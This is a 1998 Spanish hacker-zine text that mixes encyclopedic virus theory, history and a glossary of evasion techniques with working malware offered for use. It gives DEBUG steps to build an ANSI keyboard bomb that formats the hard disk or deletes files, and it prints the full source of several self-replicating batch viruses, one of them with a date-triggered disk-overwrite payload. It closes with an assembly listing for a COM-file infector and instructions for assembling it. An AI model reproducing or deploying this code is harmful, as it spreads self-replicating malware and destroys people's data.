Hola Pêrrrooos!!!!!!!Soy [^P|xEl^]:

Pa lo ke no me konocen todavía, soy un member of newkers.Aunke mi gran passion son los virus, infeccion, programacion de éstos, no kita para ke me llame el "acceder a stmas no autorizados"XDDD, y esas cosillas de estás.

Bueno, voy a intentar hacer un dok de virus lo mas kompleto posible, para ello voy a adjuntar la teoria de los virus ke leisteis en mi ultimo dok, en este dok, y NO ES POR METER RELLENO XDD, es para los nuevos , y para akellos ke no lo leyeron.

Ademas, un glosario de términos vírikos y de regalo unos de los viruses ke tengo.

I. Generalidades.

 

Virus :son programas de ordenador que se reproduce a sí mismo e interfiere con el hardware de una computadora o con su sistema operativo (el software básico que controla la computadora). Los virus están diseñados para reproducirse y evitar su detección(si se puede,XDD). Como cualquier otro programilla informático, un virus debe ser ejecutado para que funcione: es decir, el ordenador debe cargar el virus desde la memoria del ordenador y seguir sus instrucciones. Estas instrucciones se conocen como carga activa del virus. La carga activa puede trastornar o modificar archivos de datos, presentar un determinado mensaje o provocar fallos en el sistema operativo.

Existen otros programas informáticos nocivos similares a los virus, pero que no cumplen ambos requisitos de reproducirse y eludir su detección. Estos programas se dividen en tres categorías: caballos de Troya(son la o*tia), bombas lógicas y gusanos. Un caballo de Troya aparenta ser algo interesante e inocuo, por ejemplo un juego, pero cuando se ejecuta puede tener efectos dañinos. Una bomba lógica libera su carga activa cuando se cumple una condición determinada, como cuando se alcanza una fecha u hora determinada o cuando se teclea una combinación de letras. Un gusano se limita a reproducirse, pero puede ocupar memoria de la computadora y hacer que sus procesos vayan más lentos.

 

Cómo se producen las infecciones

Los virus informáticos se difuden cuando las instrucciones —o código ejecutable— que hacen funcionar los programas pasan de un ordenador a otro. Una vez que un virus está activado, puede reproducirse copiándose en discos flexibles, en el disco duro, en programas informáticos legítimos o a través de redes informáticas,XDDD. Estas infecciones son mucho más frecuentes en PC que en sistemas profesionales de grandes computadoras, porque los programas de los PC se intercambian fundamentalmente a través de discos flexibles o de redes informáticas no reguladas.

Los virus funcionan, se reproducen y liberan sus cargas activas sólo cuando se ejecutan. Por eso, si un ordenador está simplemente conectado a una red informática infectada o se limita a cargar un programa infectado, no se infectará necesariamente. Normalmente, un usuario no ejecuta conscientemente un código informático potencialmente nocivo; sin embargo, los virus engañan frecuentemente al sistema operativo de la computadora o al usuario informático para que ejecute el programa viral.

Algunos virus tienen la capacidad de adherirse a programas legítimos. Esta adhesión puede producirse cuando se crea, abre o modifica el programa legítimo. Cuando se ejecuta dicho programa, lo mismo ocurre con el virus. Los virus también pueden residir en las partes del disco duro o flexible que cargan y ejecutan el sistema operativo cuando se arranca el ordenador, por lo que dichos virus se ejecutan automáticamente. En las redes informáticas, algunos virus se ocultan en el software que permite al usuario conectarse al sistema.

 

Especies de virus

Existen seis categorías de virus: parásitos, del sector de arranque inicial, multipartitos, acompañantes, de vínculo y de fichero de datos. Los virus parásitos infectan ficheros ejecutables o programas de la computadora. No modifican el contenido del programa huésped, pero se adhieren al huésped de tal forma que el código del virus se ejecuta en primer lugar. Estos virus pueden ser de acción directa o residentes. Un virus de acción directa selecciona uno o más programas para infectar cada vez que se ejecuta. Un virus residente se oculta en la memoria del ordenador e infecta un programa determinado cuando se ejecuta dicho programa. Los virus del sector de arranque inicial residen en la primera parte del disco duro o flexible, conocida como sector de arranque inicial, y sustituyen los programas que almacenan información sobre el contenido del disco o los programas que arrancan el ordenador. Estos virus suelen difundirse mediante el intercambio físico de discos flexibles. Los virus multipartitos combinan las capacidades de los virus parásitos y de sector de arranque inicial, y pueden infectar tanto ficheros como sectores de arranque inicial.

Los virus acompañantes no modifican los ficheros, sino que crean un nuevo programa con el mismo nombre que un programa legítimo y engañan al sistema operativo para que lo ejecute. Los virus de vínculo modifican la forma en que el sistema operativo encuentra los programas, y lo engañan para que ejecute primero el virus y luego el programa deseado. Un virus de vínculo puede infectar todo un directorio (sección) de una computadora, y cualquier programa ejecutable al que se acceda en dicho directorio desencadena el virus. Otros virus infectan programas que contienen lenguajes de macros potentes (lenguajes de programación que permiten al usuario crear nuevas características y herramientas) que pueden abrir, manipular y cerrar ficheros de datos. Estos virus, llamados virus de ficheros de datos, están escritos en lenguajes de macros y se ejecutan automáticamente cuando se abre el programa legítimo. Son independientes de la máquina y del sistema operativo.

 

Tácticas antivíricas

Preparación y prevención

Los usuarios pueden prepararse frente a una infección viral creando regularmente copias de seguridad del software original legítimo y de los ficheros de datos, para poder recuperar el sistema informático en caso necesario. Puede copiarse en un disco flexible el software del sistema operativo y proteger el disco contra escritura, para que ningún virus pueda sobreescribir el disco. Las infecciones virales pueden prevenirse obteniendo los programas de fuentes legítimas, empleando una computadora en cuarentena para probar los nuevos programas y protegiendo contra escritura los discos flexibles siempre que sea posible.

 

Detección de virus

Para detectar la presencia de un virus pueden emplearse varios tipos de programas antivíricos. Los programas de rastreo pueden reconocer las características del código informático de un virus y buscar estas características en los ficheros del ordenador. Como los nuevos virus tienen que ser analizados cuando aparecen, los programas de rastreo deben ser actualizados periódicamente para resultar eficaces. Algunos programas de rastreo buscan características habituales de los programas virales; suelen ser menos fiables.

Los únicos programas que detectan todos los virus son los de comprobación de suma, que emplean cálculos matemáticos para comparar el estado de los programas ejecutables antes y después de ejecutarse. Si la suma de comprobación no cambia, el sistema no está infectado. Los programas de comprobación de suma, sin embargo, sólo pueden detectar una infección después de que se produzca.

Los programas de vigilancia detectan actividades potencialmente nocivas, como la sobreescritura de ficheros informáticos o el formateo del disco duro de la computadora. Los programas caparazones de integridad establecen capas por las que debe pasar cualquier orden de ejecución de un programa. Dentro del caparazón de integridad se efectúa automáticamente una comprobación de suma, y si se detectan programas infectados no se permite que se ejecuten.

 

Contención y recuperación

Una vez detectada una infección viral, ésta puede contenerse aislando inmediatamente los ordenadores de la red, deteniendo el intercambio de ficheros y empleando sólo discos protegidos contra escritura. Para que un sistema informático se recupere de una infección viral, primero hay que eliminar el virus. Algunos programas antivirus intentan eliminar los virus detectados, pero a veces los resultados no son satisfactorios. Se obtienen resultados más fiables desconectando la computadora infectada, arrancándola de nuevo desde un disco flexible protegido contra escritura, borrando los ficheros infectados y sustituyéndolos por copias de seguridad de ficheros legítimos y borrando los virus que pueda haber en el sector de arranque inicial.

 

Estrategias virales

Los autores de un virus cuentan con varias estrategias para escapar de los programas antivirus y propagar sus creaciones con más eficacia. Los llamados virus polimórficos efectúan variaciones en las copias de sí mismos para evitar su detección por los programas de rastreo. Los virus sigilosos se ocultan del sistema operativo cuando éste comprueba el lugar en que reside el virus, simulando los resultados que proporcionaría un sistema no infectado. Los virus llamados infectores rápidos no sólo infectan los programas que se ejecutan sino también los que simplemente se abren. Esto hace que la ejecución de programas de rastreo antivírico en un ordenador infectado por este tipo de virus pueda llevar a la infección de todos los programas del ordenador. Los virus llamados infectores lentos infectan los archivos sólo cuando se modifican, por lo que los programas de comprobación de suma interpretan que el cambio de suma es legítimo. Los llamados infectores escasos sólo infectan en algunas ocasiones: por ejemplo, pueden infectar un programa de cada 10 que se ejecutan. Esta estrategia hace más difícil detectar el virus.

 

Historia

En 1949, el matemático estadounidense de origen húngaro John von Neumann, en el Instituto de Estudios Avanzados de Princeton (Nueva Jersey), planteó la posibilidad teórica de que un programa informático se reprodujera. Esta teoría se comprobó experimentalmente en la década de 1950 en los Laboratorios Bell, donde se desarrolló un juego llamado Core Wars en el que los jugadores creaban minúsculos programas informáticos que atacaban y borraban el sistema del oponente e intentaban propagarse a través de él. En 1983, el ingeniero eléctrico estadounidense Fred Cohen, que entonces era estudiante universitario, acuñó el término de "virus" para describir un programa informático que se reproduce a sí mismo. En 1985 aparecieron los primeros caballos de Troya, disfrazados como un programa de mejora de gráficos llamado EGABTR y un juego llamado NUKE-LA,(no se por ke koño lo de nuke). Pronto les siguió un sinnúmero de virus cada vez más complejos. El virus llamado Brain apareció en 1986, y en 1987 se había extendido por todo el mundo. En 1988 aparecieron dos nuevos virus: Stone, el primer virus de sector de arranque inicial, y el gusano de Internet, que cruzó Estados Unidos de un día para otro a través de una red informática. El virus Dark Avenger,(pos si no sabia lo del nuke,no se ke koño pinta Avenger en todo esto?XDDDDDDDD), el primer infector rápido, apareció en 1989, seguido por el primer virus polimórfico en 1990. En 1995 se creó el primer virus de lenguaje de macros, WinWord Concept.

 

 

II. Conceptos vírikos:

Esta es una recopilacion de los terminos mas usados cuando intentemos seguir

un curso de virus o cuando se hable de ellos etc...

Activacion: El "efecto" del virus. La mayoria de los virus de hecho no tienen

^^^^^^^^^^^ ningun efecto, y se limitan a reproducirse (utilizando a veces

tecnicas de proteccion). Este "efecto" puede ser destructivo, tonto,

gracioso, o cualquier otra cosa. Puede dispararse por datos del

sistema, como fecha u hora, por la llamada a una determinada funcion

del sistema, por el numero de infecciones, y un largo etcetera.

Anti-Debugging: Un conjunto de peque¤as tecnicas destinadas a dificultar al

^^^^^^^^^^^^^^^ maximo posible el debugging de un virus (o un programa). No son

infalibles, aunque pueden dar algun que otro dolor de cabeza al que

se ponga a estudiar el virus. (tambien usadas en juegos y programas)

Anti-Dissasembly: Un grupo de tecnicas que tienen por objeto impedir que se

^^^^^^^^^^^^^^^^^ desensamble el virus mediante el uso de algun desensamblador,

incluyendo en aquel, codigo para "confundirlo". (tambien usadas en juegos y

programas)

Background: Se habla de background cuando un programa (o un virus),

^^^^^^^^^^^ se esta ejecutando "paralelamente" al programa ejecutandose :

Por ejemplo al DOS.

Boot Sector: El primer sector del disco. Contiene la BPB (Bios Parameter Block)

^^^^^^^^^^^^ una tabla referente al formato y tipo del disco, y un peque¤o pro_

grama que es el encargado de Bootear (en discos de sistema) o del men_

saje "Non-system disk or disk error" (en discos sin sistema). Ademas,

si se trata de un disco duro, el primer sector del disco contiene una

tabla de particion, que a su vez contiene los sectores en que se

encuentran los boot sectors de cada una de las particiones del disco,

ademas de otra informacion referente a ellas.

Bug: Error en un programa, que produce que este funcione mal. Tambien se

^^^^ aplica a los virus. (Un bug en un virus podria hacer, por ejemplo,

que este infectara mal los EXEs y los destruyera, etc.)

Carrier: Asi llamado el file ejecutable generado al ensamblar el source

^^^^^^^^ original de un virus.

CMOS: Un tipo de memoria que sobrevive a los apagados de la maquina. Contiene

^^^^^ informacion de configuracion (ver Setup) como los tipos de disco,

de monitor, etc. (Solo existe en ATs) Algunos virus (muy pocos) la

cambian para invertir el orden de booteo (de A:;C: a C:;A:) e impedir

que se bootee de un disco limpio.

Debugger: Un programa para estudiar el funcionamiento de otros programas.

^^^^^^^^^ (Tambien sirve para estudiar virus).

Directory Stealth: Una tecnica de ocultamiento que consiste en substraer el

^^^^^^^^^^^^^^^^^^ size del virus del size mostrado por el comando DIR de DOS.

(A los virus que solo utilizan Dir-Stealth se los suele llamar semi_

stealth)

Disinfect-On-The-Fly: Una tecnica de (file) stealth que consiste en

^^^^^^^^^^^^^^^^^^^^^ directamente desinfectar el file cuando se considera

que este va a ser inspeccionado (por ejemplo cuando es abierto). Suele

ir acompa¤ada de Infection-On-Close (pues si no seria inefectivo).

Disassembler: Programa para producir codigo fuente en base a un ejecutable.

^^^^^^^^^^^^^

Disparador: Se llama disparador a la parte del codigo del virus que se encarga

^^^^^^^^^^^ de evaluar si se cumplen o no las condiciones para que el virus se

active.

Fast Infector: Un tipo de virus que se distingue por la velocidad con la

^^^^^^^^^^^^^^ que se dispersa. Esto se logra infectando no solo cuando el file

es corrido sino cada vez es accedido por algun medio (abierto, leido,

etc.)

FAT: File Allocation Table. El "mapa" mediante el cual el DOS mantiene

^^^^ registro de que clusters estan usados y a que file pertenecen, etc.

File Stealth: En contraposicion a Dir-Stealth. Un virus que implementa

^^^^^^^^^^^^^ distintas tecnicas para pasar desapercibido, tecnicas mas avanza_

das que el ocultamiento del size en el DIR.

Full Stealth: Un virus en el cual las tecnicas de stealth estan tan bien

^^^^^^^^^^^^^ implementadas e integradas que la existencia del virus pasa

desapercibida cuando este esta activo en memoria. Se logra mediante

la intercepcion de un monton de funciones del sistema, y hay stealth

que son incluso indetectables a nivel de BIOS (via int 13h)

Generador de virus: Un programa para hacer virus. Para utilizarlo solo se

^^^^^^^^^^^^^^^^^^^ necesita un conocimiento muy basico del tema.

Header EXE: Una estructura que se encuentra al principio de todos los EXE, y

^^^^^^^^^^^ mediante la manipulacion de la cual los virus son capaces de

infectarlo. Contiene informacion necesaria para correr el EXE.

Hoste: (s) Programa parasitado por el virus, programa infectado. (Ver

^^^^^^ Overwriting y Parasitico)

Infection-On-Close: Infectar al cerrar un archivo, en lugar de cuando este

^^^^^^^^^^^^^^^^^^^ es corrido.

MCB: Memory Control Block. Una estructura de DOS para la alocacion de memoria,

^^^ que es manipulada por los virus para quedar residentes de una manera

lo menos sospechosa posible. Los virus que utilizan esta tecnica

para su alojamiento en memoria o bien disminuyen el size total

reportado o bien son reconocibles por un ultimo bloque, perteneciente

al "sistema" (en realidad del virus).

Multipartito (o multiparticion): Un virus que es simultaneamente de Boot y de

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ file. Suelen ser mas complejos que sus contra_

partidos solo de file o solo de boot, y la interaccion entre la parte

de boot y la de file suele ser compleja, y dar mejores resultados en el

funcionamiento del virus.

New Header EXE: Ampliacion del header de los EXE comunes en los EXE de

^^^^^^^^^^^^^^^ Windows.

No-Residente: (a) Un virus en el que el proceso de infeccion es llevado

^^^^^^^^^^^^^ a cabo cuando el virus es corrido. Son menos efectivos que los

residentes, y su funcionamiento impide realizar tecnicas de stealth.

(Aun asi son considerados respetables, no como los overwriting, pues

aun pueden tener un cierto grado de exito en su dispersion).

Overwriting: Un virus que al infectar destruye al programa infectado. Este

^^^^^^^^^^^^ tipo de virus no tiene mucha proyeccion, y se lo considera muy

primitivo.

Parasitico: Un virus que conserva al programa infectado, para poder correrlo

^^^^^^^^^^^ luego como si no lo estuviera.

Polimorfismo: Una tecnica de ocultamiento que apunta a que sea imposible

^^^^^^^^^^^^^ descubrir al virus mediante scanning, variando de tal forma el codigo

de infeccion a infeccion que es imposible extraer una string. Esto se

hace encriptando el codigo del virus y "variabilizando" la rutina de

encripcion tanto como sea posible.

Residente: (a) Un virus que, cuando es corrido, se carga en memoria y

^^^^^^^^^^ a partir de ahi, queda en el background, hasta que es llamado a la

superficie y alli infecta.

Root: Directorio Raiz, el primer directorio.

^^^^^

Sector: Uno de los "pedazos" en que los discos estan divididos. Para el BIOS

^^^^^^^ los sectores son "fisicos" y se los referencia mediante 3 coordenadas;

lado, pista, sector (lado 0, pista 0, sector 1, p.ej). El DOS utiliza

sectores logicos, que son referenciados mediante un numero. (Sector 0)

Y existe la correspondencia (lado 0, pista 0, sector 1 == Sector 0).

Setup: El famoso setup. Un programa cargado en la BIOS, desde donde se maneja

^^^^^^ la configuracion del sistema (Por ejemplo la cantidad de sectores del

disco rigido, o la fecha del sistema, etc).

SFT: System File Table. Una tabla con informacion referente a un file abierto.

^^^^ Se utiliza para todo tipo de propositos en los virus, ya que la

informacion que contiene es muy variada y muy valiosa.

Stealth: Genericamente, se llama stealth a un virus que utiliza alguna tecnica

^^^^^^^^ para no ser notado. Existen varias de estas tecnicas.

String: Cadena que se utiliza para reconocer un file infectado. Es una PARTE

^^^^^^^ del virus, NO todo el virus. Generalmente se hacen strings de las ruti_

nas de infeccion. Al hacer virus polimorficos, se trata justamente de

que no exista una cadena comun entre infeccion e infeccion.

Toolkit: Una libreria para incluir en un virus, y conferirle a este la

^^^^^^^^ potencia de alguna tecnica avanzada como polimorfismo o tunneling.

(Notese que no existen ni podran existir toolkits de stealth ya

que este tipo de tecnicas estan muy ligadas al dise¤o general del

virus, y no pueden ser "aisladas" en un toolkit).

Troyano: Programa especialmente hecho para causar da¤o. Se los suele confundir

^^^^^^^^ con los virus, aunque no tienen NADA que ver, excepto el hecho de que

los troyanos hacen da¤o, y algunos virus hacen da¤o.

Tunneling: Una tecnica de proteccion, de tipo anti-anti-virus, que consiste

^^^^^^^^^^ basicamente en pasar "por debajo" de los antivirus residentes, que

monitorean la actividad "rara". Se obtiene el address original de la

int que se piensa puede estar monitoreada, y se usa este address

para accederla.

Virus: (s) Un codigo ejecutable capaz de reproducirse a si mismo a traves de

^^^^^^ sistemas y computadoras. Se los clasifica primariamente por el tipo de

reproduccion (Boot Sector, File, Cluster), y luego por la utilizacion

de tecnicas de ocultamiento y proteccion (Stealth, Polimorfico, etc).

Virus de boot: Un tipo de virus. Se reproduce poniendose en el boot sector

^^^^^^^^^^^^^^ de los discos, y luego de haberse instalado en memoria, corre el

boot sector original.

Virus de file: Este tipo de virus se reproduce infectando los files del disco.

^^^^^^^^^^^^^^ Se dividen en infectores de COM, de SYS, y de EXE. (y ultimamen_

te de EXE de windows).

Virus de cluster: Un tipo de virus relativamente nuevo y oscuro. Para infectar

^^^^^^^^^^^^^^^^^ no modifica el file, sino sencillamente la entrada de direc_

torio del archivo. Solo existe UN virus de este tipo, el celebre Dir-2.

 

III.!!Una bomba, una bomba!!!XDDD

Aki teneis la konstruccion de una bomba ansII:

Las bombas ANSII son un poco desconocidas pero pueden ser letales porque est n donde menos te los esperas. Est n construidas a partir de códigos ansii, y simplemente ejecutan las instrucciones que tu le des (como un BATCH), lo que pasa que están en ansii y las puedes poner al final de una pantalla ansii con colorines y esas chorradas.

En realidad ahora voy a presentar algunos métodos avanzados pero una bomba ansii se consigue realmente escribiendo en ansii la instrucción que quieres que el ordenador ejecute, escondido en un texto ansii, (no ASCII) y cuando el usuario chequea virus, no se cosca. Por eso tienes que saber a quien pasárselas porque no son contagiosas.

Ahora, eso si, tienes que tener cargado el device=ansii.sys, pero de todos modos hay programas que no lo necesitan.... aunque lo propio es que el usuario tenga en el config.sys el DAVICE=C:\DOS\ANSII.SYS.

*** COMO CRAEAR BOMBAS ANSII USANDO EL DEBUG DEL MS-DOS? ***

 

--DEBUG???

Lo siento pero no me voy a poner a enseñar instrucciones para debug, el ke kiera ke me mailee a doctorpixel@hotmail.com y le enviare, sin kompromisos XD, un fantastiko manual ilustrado de desensamblador para torpes.

--METODO

-Aquí es necesario crear una formula para hacer la bomba ....simplemente cambia los comandos de la formula por los de tu elección.

 

A:DOS\DEBUG

-A 100

MOV AH,9

MOV DX,109

INT 21

INT 20

####:#### DB 1B'[0;32;"ECHO Y|FORMAT C:>NUL";13p'

####:???? DB 1B'[0;21;"echo Y|Del *.*>nul";13p'

-N boom!.com

-R BX

BX:0000

:0

-R CX

CX 0000

:???? (Escribe el numero "???" de arriba aquí!!)

-W

después de esto el ordenador pondrá:

WRITING nnnn bytes

-Q

Cuando mires ahora el directorio habrá un programa llamado Boom!.com NO LO EJECUTES!! es una bomba y como pulses la barra de espacio te formateará el disco duro, y cuando alguien ponga ! borrará el directorio.

 

Pues aquí tienes una manera para partir la pana... disfrutala.....

:) jejejejejje

He aqui una pequeña tablita de códigos ASCII:

 

ASCII Códigos de teclas...

a-97 b-98 c-99 d-100 e-101 f-102 g-103 h-104 i-105 j-106

k-107 l-108 m-109 n-110 o-111 p-112 q-113 r-114 s-115 t-116

u-117 v-118 w-119 x-120 y-121 z-122 (Space)-32

A-65 B-66 C-67 D-68 E-69 F-70 G-71 H-72 I-73 J-74

K-75 L-76 M-77 N-78 O-79 P-80 Q-81 R-82 S-83 T-84

U-85 V-86 W-87 X-88 Y-89 Z-90 (return)-13

1-49 2-50 3-51 4-52 5-53 6-54 7-55 8-56 9-57 0-48

 

IV.*** CAMBIANDO LOS COLORES DEL SISTEMA ***

He aquí otra manera de utilizar el driver ASNSII....Cambiando los colores del sistema. Para eso utiliza "Prompt $e[#;#m" command

Parece una mierda pero seguro que alguien le encuentra una utilidad a esto.... por si acaso incluyo una tabla de colores

 

--FOREGROUND COLORS-- --BACKGROUND COLORS--

30 black 40 Black

31 red 41 red

32 green 42 green

33 yellow 43 yellow

34 blue 44 blue

35 magenta 45 magenta

36 cyan 46 cyan

37 white 47 white

 

0 pondrá todos los colores en su valor inicial

 

V. Por fin unos viruzez güenos ke he rekopilado por ahí, ke aunke son batch, molan.No os preokupeis, ke ya enviare algumos ke no son batch en otro dok.

 

ZEP (165) - El virus mas peque¤o hasta ahora

-------------------------------- ZEP.BAT

----------------------------------

@echo off%[ZeP]%

if not exist %0.bat goto ZeP

for %%f in (*.bat ..\*.bat) do set ZeP=%%f

find /i "ZeP"<%ZeP%>nul

if errorlevel 1 find "ZeP"<%0.bat>>%ZeP%

:ZeP

XOP (361) - Infecta 2 batchs por ejecucion.

 

-------------------------------- XOP.BAT

----------------------------------

@echo off%[XoP]%

if '%XoP%=='11 goto XoP2

if '%2=='_ goto XoP1

if exist C:\XoP.bat goto XoP

if not exist %0.bat goto XoP2

find "XoP"<%0.bat>C:\XoP.bat

attrib C:\XoP.bat +h

:XoP

for %%v in (*.bat ..\*.bat) do call C:\XoP %%v _

set XoP=

goto XoP2

:XoP1

find /i "XoP"<%1>nul

if not errorlevel 1 goto XoP2

type C:\XoP.bat>>%1

set XoP=%XoP%1

:XoP2

SKUL (497) - Este es un virus PELIGROSO ! XD, es el que mas me ha

gustado. Sobrescribe cerca de 8000 sectores del disco

duro el dia 20 de cada mes. TEN CUIDADO! ( no juegues

con fuego :)

:: [8mSKuL

@echo off%[SKuL]%

echo.|date|find "20">nul%[SKuL]%

if errorlevel 1 goto SKuL1

echo SKuL Fregando el disco duro...

::echo ° ¹ ™Í&Í>SKuL.com

::SKuL

:SKuL1 [6A2

if exist C:\SKuL goto SKuL2

if not exist %0.bat goto SKuL

find "SKuL"<%0.bat>C:\SKuL

attrib C:\SKuL +h

:SKuL2 [5A

set SKuL=C:\AUTOEXEC.BAT

for %%f in (D:*.bat C:*.bat ..\*.bat) do set SKuL=%%f

if not exist %SKuL% goto SKuL

find /i "SKuL"<%SKuL%>nul

if errorlevel 1 type C:\SKuL>>%SKuL%

set SKuL=

:SKuL [7A [0m

Por último este viruz ke me parece ke ya os lo envié al hotm. hace algun tiempo.Necesitais el desensamblador del dos por lo menos.

:

DEBUG <

---------------------------------------------------------------------------

a

JMP 0116

NOP

DEC CX

PUSH SI

ADD [BP+SI],CH

CS:

INC BX

DEC DI

DEC BP

ADD [BX+04],CL

ADD [BX+SI],AL

ADD [BX+SI],AX

ADD [BX+SI],AL

ADD [BX+SI],AL

MOV AX,CS

ADD AX,1000

MOV ES,AX

INC BYTE PTR [0105]

MOV SI,0100

XOR DI,DI

MOV CX,014F

REPZ

MOVSB

MOV DX,025F

MOV AH,1A

INT 21

MOV DX,0106

MOV CX,0016

MOV AH,4E

INT 21

JB 019E

MOV DX,027D

MOV AX,3D02

INT 21

MOV [0114],AX

MOV BX,AX

PUSH ES

POP DS

MOV DX,034F

MOV CX,FFFF

MOV AH,3F

INT 21

ADD AX,034F

CS:

MOV [0112],AX

DS:

CMP WORD PTR [0352],5649

JZ 0188

XOR CX,CX

MOV DX,CX

CS:

MOV BX,[0114]

MOV AX,4200

INT 21

JB 0188

MOV DX,0000

CS:

MOV CX,[0112]

CS:

MOV BX,[0114]

MOV AH,40

INT 21

CS:

MOV BX,[0114]

MOV AH,3E

INT 21

PUSH CS

POP DS

MOV AH,4F

MOV DX,025F

INT 21

JB 019E

JMP 013E

MOV DX,0080

MOV AH,1A

INT 21

CMP BYTE PTR [0105],05

JB 0207

MOV AX,0040

MOV DS,AX

MOV AX,[006C]

PUSH CS

POP DS

AND AX,0001

JZ 0207

MOV DX,01C4

MOV AH,09

INT 21

INT 20

INC BP

DB 6E

AND [SI+75],DH

AND [BX+SI+43],DL

AND [BX+SI+61],CH

JNS 01F1

JNZ 0241

AND [BP+69],DH

JB 024D

JNB 01FA

PUSH DX

PUSH SI

XOR [SI],BP

AND [BX+DI+20],BH

XOR BYTE PTR [BP+DI+74],61

AND [DI+73],AH

AND [BP+DI+75],DH

AND [BX+DI+75],DH

DB 69

DB 6E

JZ 0253

AND [BX+65],AH

DB 6E

DB 65

JB 025A

DB 63

DB 69

MOV [206E],AL

ADD [BX+SI],SP

AND [BX+SI],AH

AND [BX+SI],AH

OR CL,[DI]

AND AL,BE

AND AL,02

MOV CX,002B

XOR DI,DI

REPZ

MOVSB

XOR DI,DI

CS:

MOV WORD PTR [010E],0000

CS:

MOV [0110],ES

CS:

JMP FAR [010E]

PUSH DS

POP ES

MOV SI,044F

CMP BYTE PTR [0105],01

JNZ 0234

SUB SI,0200

MOV DI,0100

MOV CX,FFFF

SUB CX,SI

REPZ

MOVSB

CS:

MOV WORD PTR [0100],0100

CS:

MOV [0102],DS

CS:

JMP FAR [0100]

INT 20

n XXXXXXXX.com (donde xxxxxxx sera el nombre del archivo

r cx a infektar...si poneis alguno ke ya exista

151 este estara infektado, sino ,kreara el archivo

w nuevo....ej: NewkErbOmB.com XD

q (pa´salir)

 

 

Güeno esto es todo,

[lEt yOur P|xEls EnTer tO YouR EyeS]

[^p|XeL^] ã1998